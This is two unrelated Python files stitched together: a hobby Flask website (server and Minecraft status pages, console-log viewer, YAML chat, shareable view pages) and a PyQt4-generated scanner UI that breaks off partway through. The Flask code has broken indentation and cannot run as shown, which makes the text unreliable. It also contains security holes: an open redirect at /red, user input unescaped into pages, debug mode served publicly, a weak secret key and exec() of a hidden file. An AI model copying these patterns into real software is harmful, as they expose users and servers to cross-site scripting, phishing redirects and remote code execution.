import os
import json
import yaml
import time
import flask
import distro
import psutil
import random
import string
import threading
import jinja2.exceptions
from flask import request
from turbo_flask import Turbo
from datetime import datetime
try:
    from mcipc.query import Client
except ImportError:  # mcipc isn't installed, so the Minecraft status page can't query the server
    Client = None
from html import escape, unescape
app = flask.Flask(__name__, static_url_path='/')
app.secret_key = ''.join(random.sample('ABCDEF0123456789', 6))  # secret_key must be a string, not a list
turbo = Turbo(app)
view_urls = {}
SERVER_NAME = 'paper'
@app.route('/x/<path:subpath>')
def show_subpath(subpath):
return f'Subpath {escape(subpath)}'
@app.route('/')
def home():
return flask.render_template('index.html')
@app.errorhandler(jinja2.exceptions.TemplateNotFound)
def template_not_found(error):
    with open('redirects.yml') as f:
        redirects = yaml.load(f, Loader=yaml.FullLoader)
    path = error.name.replace('.html', '')
    if path in redirects:
        return flask.redirect(redirects[path])
    return flask.render_template('error.html', title='Page not found!', description=f'Couldn\'t find this website: {error.name}')
@app.errorhandler(404)
def error_404(error):
    return flask.render_template('error.html', title='File not found!', description='Couldn\'t find this file.')
@app.route('/view-create', methods=['GET', 'POST'])
def create_page():
global view_urls
    if request.method == 'GET':
        return flask.render_template('error.html', title='Unsupported request method!', description='This page can\'t be viewed with GET; it expects a POST.')
code = ''.join(random.sample(string.ascii_lowercase + string.ascii_uppercase + string.digits, 5))
view_urls[code] = request.get_json()
return f'https://onlix.me/view/{code}'
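# Hypothetical usage sketch for the endpoint above: POST a JSON body with
# 'title' and 'text' keys and the response is a shareable /view/<code> URL:
#   curl -X POST -H 'Content-Type: application/json' \
#        -d '{"title": "Hello", "text": "World"}' https://onlix.me/view-create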
def fix_formatting(text: str):
return text.replace(' ', ' ').replace('\n', '\n<br>\n')
@app.route('/view/<code>')
def view_page(code):
global view_urls
if not view_urls.get(code):
return flask.render_template(f'error.html', title='View page not found!', description=f'Couldn\'t find this code: {code}')
return flask.render_template(f'view.html', title=fix_formatting(unescape(view_urls[code]['title'])), text=fix_formatting(unescape(view_urls[code]['text'])))
def readable_size(size):
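    # Convert a byte count to gigabytes rounded to one decimal place,
    # e.g. readable_size(1_500_000_000) -> 1.5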
return round(size/1000000000, 1)
@app.route('/status')
def status_page():
ram = psutil.virtual_memory()
disk = psutil.disk_usage('/')
    return flask.render_template('status.html',
        cpu=psutil.cpu_percent(),
        cpus=psutil.cpu_count(logical=False),  # physical cores
        threads=psutil.cpu_count(),  # logical CPUs (hardware threads)
        ram=f'{readable_size(ram.used)}/{readable_size(ram.total)} GB ({ram.percent}%)',
        disk=f'{readable_size(disk.used)}/{readable_size(disk.total)} GB ({disk.percent}%)',
        pids=len(psutil.pids()),
        boot_days=round((time.time()-psutil.boot_time())/86400),
        os=f'{distro.linux_distribution()[0]} {distro.linux_distribution()[1]}',
    )
@app.route('/status/mc')
def status_mc():
ops = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/ops.json').read())]
bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-players.json").read())]
ip_bans = [x['name'] for x in json.loads(open(f"/home/minecraft/{SERVER_NAME}/banned-ips.json").read())]
whitelist = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/whitelist.json').read())]
last_players = [x['name'] for x in json.loads(open(f'/home/minecraft/{SERVER_NAME}/usercache.json').read())[:5]]
with Client('127.0.0.1', 25565) as client:
server_data = client.stats(full=True)
plugin_list = list(server_data.plugins.values())[0]
return flask.render_template(f'status_mc.html',
players=server_data.players,
player_count=f'{server_data.num_players}/{server_data.max_players}' if server_data else '0/0',
version=server_data.version if server_data else 'Offline',
        game_type=server_data.game_type if server_data else 'Server is not available',
last_player=last_players,
last_players=len(last_players),
whitelist=whitelist,
whitelisted=len(whitelist),
plugin=plugin_list,
plugins=len(plugin_list),
op=ops,
ops=len(ops),
normal_ban=bans,
ip_ban=ip_bans,
normal_bans=len(bans),
ip_bans=len(ip_bans)
)
@app.route('/red')
def red(*args, **kwargs):
try:
return flask.redirect(unescape(list(flask.request.args.keys())[0]))
except IndexError:
return flask.redirect('/')
@app.route('/mc-console-log')
def mc_console_log():
log = []
lines = open(f'/home/minecraft/{SERVER_NAME}/.console_history').read().split('\n')[:-1]
for line in lines:
        line_date, line_command = line.split(':', 1)  # split on the first ':' only, so commands containing ':' stay intact
for x in ['w', 'msg', 'teammsg', 'tell']:
if line_command.startswith(x):
line_command = f'{x} [CENSORED]'
if line_command.startswith('ban-ip '):
line_command = 'ban-ip [CENSORED IP]'
if line_command.startswith('pardon-ip'):
line_command = 'pardon-ip [CENSORED IP]'
line_date = datetime.fromtimestamp(int(line_date)//1000).strftime('%d.%m.%y %H:%M:%S')
log.append({'time': line_date, 'command': line_command})
log.reverse()
return flask.render_template(f'mcclog.html', log=log, server_name=SERVER_NAME)
def read_chat(channel=None):
data = yaml.load(open('chats.yml'), Loader=yaml.FullLoader)
data = data or {}
return data.get(channel) or data
def send_message(channel, user='Guest', text=''):
chat = read_chat()
if not chat.get(channel):
chat[channel] = []
chat[channel].append({'user': user, 'text': text})
yaml.dump(chat, open('chats.yml', 'w'), sort_keys=False, default_flow_style=False)
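# Resulting chats.yml structure (one list of messages per channel):
#   <channel>:
#     - user: Guest
#       text: hello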
@app.route('/chat/<channel>', methods=['GET', 'POST'])
def chat_channel(channel):
if flask.request.form.to_dict().get('message'):
send_message(channel, flask.request.args.get('from') or 'Guest', flask.request.form.to_dict().get('message'))
if not read_chat(channel):
return flask.render_template(f'chat_error.html')
return flask.render_template(f'chat.html', channel=channel, messages=reversed(read_chat(channel)))
@app.before_first_request
def before_first_request():
threading.Thread(target=update_load).start()
def update_load():
with app.app_context():
while True:
time.sleep(5)
turbo.push(turbo.replace(flask.render_template('chat.html'), 'load'))
### RUN CLOSED SOURCE ###
exec(open('closed.hidden.py').read())
### ================= ###
if __name__ == '__main__':
app.run(host='0.0.0.0', port=2021, debug=True)
|
python
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'scanwindow.ui'
#
# Created: Sun Jun 5 22:23:54 2016
# by: PyQt4 UI code generator 4.10.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName(_fromUtf8("MainWindow"))
MainWindow.resize(727, 583)
self.centralwidget = QtGui.QWidget(MainWindow)
self.centralwidget.setObjectName(_fromUtf8("centralwidget"))
self.horizontalLayout_3 = QtGui.QHBoxLayout(self.centralwidget)
self.horizontalLayout_3.setObjectName(_fromUtf8("horizontalLayout_3"))
self.tabWidget = QtGui.QTabWidget(self.centralwidget)
self.tabWidget.setTabPosition(QtGui.QTabWidget.South)
self.tabWidget.setObjectName(_fromUtf8("tabWidget"))
self.tab = QtGui.QWidget()
self.tab.setObjectName(_fromUtf8("tab"))
self.verticalLayout_3 = QtGui.QVBoxLayout(self.tab)
self.verticalLayout_3.setObjectName(_fromUtf8("verticalLayout_3"))
self.verticalLayout_2 = QtGui.QVBoxLayout()
self.verticalLayout_2.setObjectName(_fromUtf8("verticalLayout_2"))
self.txtInput = QtGui.QLineEdit(self.tab)
self.txtInput.setObjectName(_fromUtf8("txtInput"))
self.verticalLayout_2.addWidget(self.txtInput)
self.tblData = QtGui.QTableWidget(self.tab)
self.tblData.setObjectName(_fromUtf8("tblData"))
self.tblData.setColumnCount(4)
self.tblData.setRowCount(1)
item = QtGui.QTableWidgetItem()
self.tblData.setVerticalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
item.setTextAlignment(QtCore.Qt.AlignLeft|QtCore.Qt.AlignVCenter)
self.tblData.setHorizontalHeaderItem(0, item)
item = QtGui.QTableWidgetItem()
self.tblData.setHorizontalHeaderItem(1, item)
item = QtGui.QTableWidgetItem()
self.tblData.setHorizontalHeaderItem(2, item)
item = QtGui.QTableWidgetItem()
self.tblData.setHorizontalHeaderItem(3, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 0, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 1, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 2, item)
item = QtGui.QTableWidgetItem()
self.tblData.setItem(0, 3, item)
self.verticalLayout_2.addWidget(self.tblData)
self.verticalLayout_3.addLayout(self.verticalLayout_2)
self.tabWidget.addTab(self.tab, _fromUtf8(""))
self.tab_2 = QtGui.QWidget()
self.tab_2.setObjectName(_fromUtf8("tab_2"))
self.tabWidget.addTab(self.tab_2, _fromUtf8(""))
self.horizontalLayout_3.addWidget(self.tabWidget)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 727, 23))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menu_File = QtGui.QMenu(self.menubar)
self.menu_File.setObjectName(_fromUtf8("menu_File"))
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.dockLivePreview = QtGui.QDockWidget(MainWindow)
self.dockLivePreview.setFeatures(QtGui.QDockWidget.DockWidgetFloatable|QtGui.QDockWidget.DockWidgetMovable)
self.dockLivePreview.setObjectName(_fromUtf8("dockLivePreview"))
self.dockWidgetContents = QtGui.QWidget()
self.dockWidgetContents.setObjectName(_fromUtf8("dockWidgetContents"))
self.verticalLayout_6 = QtGui.QVBoxLayout(self.dockWidgetContents)
self.verticalLayout_6.setObjectName(_fromUtf8("verticalLayout_6"))
self.verticalLayout = QtGui.QVBoxLayout()
self.verticalLayout.setSpacing(5)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.verticalLayout_4 = QtGui.QVBoxLayout()
self.verticalLayout_4.setSpacing(0)
self.verticalLayout_4.setContentsMargins(-1, 5, -1, -1)
self.verticalLayout_4.setObjectName(_fromUtf8("verticalLayout_4"))
self.livePreviewContainer = QtGui.QWidget(self.dockWidgetContents)
self.livePreviewContainer.setObjectName(_fromUtf8("livePreviewContainer"))
self.gridLayout = QtGui.QGridLayout(self.livePreviewContainer)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 0, 1, 1, 1)
spacerItem1 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem1, 1, 0, 1, 1)
self.lblLiveView = QtGui.QLabel(self.livePreviewContainer)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblLiveView.sizePolicy().hasHeightForWidth())
self.lblLiveView.setSizePolicy(sizePolicy)
self.lblLiveView.setMinimumSize(QtCore.QSize(100, 75))
self.lblLiveView.setMaximumSize(QtCore.QSize(1600, 1200))
self.lblLiveView.setSizeIncrement(QtCore.QSize(0, 0))
self.lblLiveView.setBaseSize(QtCore.QSize(0, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.lblLiveView.setPalette(palette)
self.lblLiveView.setAutoFillBackground(True)
self.lblLiveView.setFrameShape(QtGui.QFrame.Box)
self.lblLiveView.setText(_fromUtf8(""))
self.lblLiveView.setScaledContents(True)
self.lblLiveView.setAlignment(QtCore.Qt.AlignHCenter|QtCore.Qt.AlignTop)
self.lblLiveView.setObjectName(_fromUtf8("lblLiveView"))
self.gridLayout.addWidget(self.lblLiveView, 1, 1, 1, 1)
spacerItem2 = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem2, 1, 2, 1, 1)
spacerItem3 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem3, 2, 1, 1, 1)
self.verticalLayout_4.addWidget(self.livePreviewContainer)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.label_3 = QtGui.QLabel(self.dockWidgetContents)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.horizontalLayout.addWidget(self.label_3)
self.chkAutoSnapshot = QtGui.QCheckBox(self.dockWidgetContents)
self.chkAutoSnapshot.setObjectName(_fromUtf8("chkAutoSnapshot"))
self.horizontalLayout.addWidget(self.chkAutoSnapshot)
self.verticalLayout_4.addLayout(self.horizontalLayout)
self.horizontalLayout_2 = QtGui.QHBoxLayout()
self.horizontalLayout_2.setObjectName(_fromUtf8("horizontalLayout_2"))
self.cmbCamera = QtGui.QComboBox(self.dockWidgetContents)
self.cmbCamera.setObjectName(_fromUtf8("cmbCamera"))
self.horizontalLayout_2.addWidget(self.cmbCamera)
self.btnRefreshCameras = QtGui.QPushButton(self.dockWidgetContents)
self.btnRefreshCameras.setText(_fromUtf8(""))
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8("ui/img/reload-2x.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnRefreshCameras.setIcon(icon)
self.btnRefreshCameras.setObjectName(_fromUtf8("btnRefreshCameras"))
self.horizontalLayout_2.addWidget(self.btnRefreshCameras)
self.verticalLayout_4.addLayout(self.horizontalLayout_2)
self.btnTakePhoto = QtGui.QPushButton(self.dockWidgetContents)
self.btnTakePhoto.setObjectName(_fromUtf8("btnTakePhoto"))
self.verticalLayout_4.addWidget(self.btnTakePhoto)
self.verticalLayout.addLayout(self.verticalLayout_4)
self.verticalLayout_6.addLayout(self.verticalLayout)
self.dockLivePreview.setWidget(self.dockWidgetContents)
MainWindow.addDockWidget(QtCore.Qt.DockWidgetArea(2), self.dockLivePreview)
self.dockSnapshotPreview = QtGui.QDockWidget(MainWindow)
self.dockSnapshotPreview.setFeatures(QtGui.QDockWidget.DockWidgetFloatable|QtGui.QDockWidget.DockWidgetMovable)
self.dockSnapshotPreview.setObjectName(_fromUtf8("dockSnapshotPreview"))
self.dockWidgetContents_2 = QtGui.QWidget()
self.dockWidgetContents_2.setObjectName(_fromUtf8("dockWidgetContents_2"))
self.gridLayout_2 = QtGui.QGridLayout(self.dockWidgetContents_2)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.lblPreview = QtGui.QLabel(self.dockWidgetContents_2)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lblPreview.sizePolicy().hasHeightForWidth())
self.lblPreview.setSizePolicy(sizePolicy)
self.lblPreview.setMinimumSize(QtCore.QSize(100, 75))
self.lblPreview.setMaximumSize(QtCore.QSize(1600, 1200))
self.lblPreview.setBaseSize(QtCore.QSize(0, 0))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
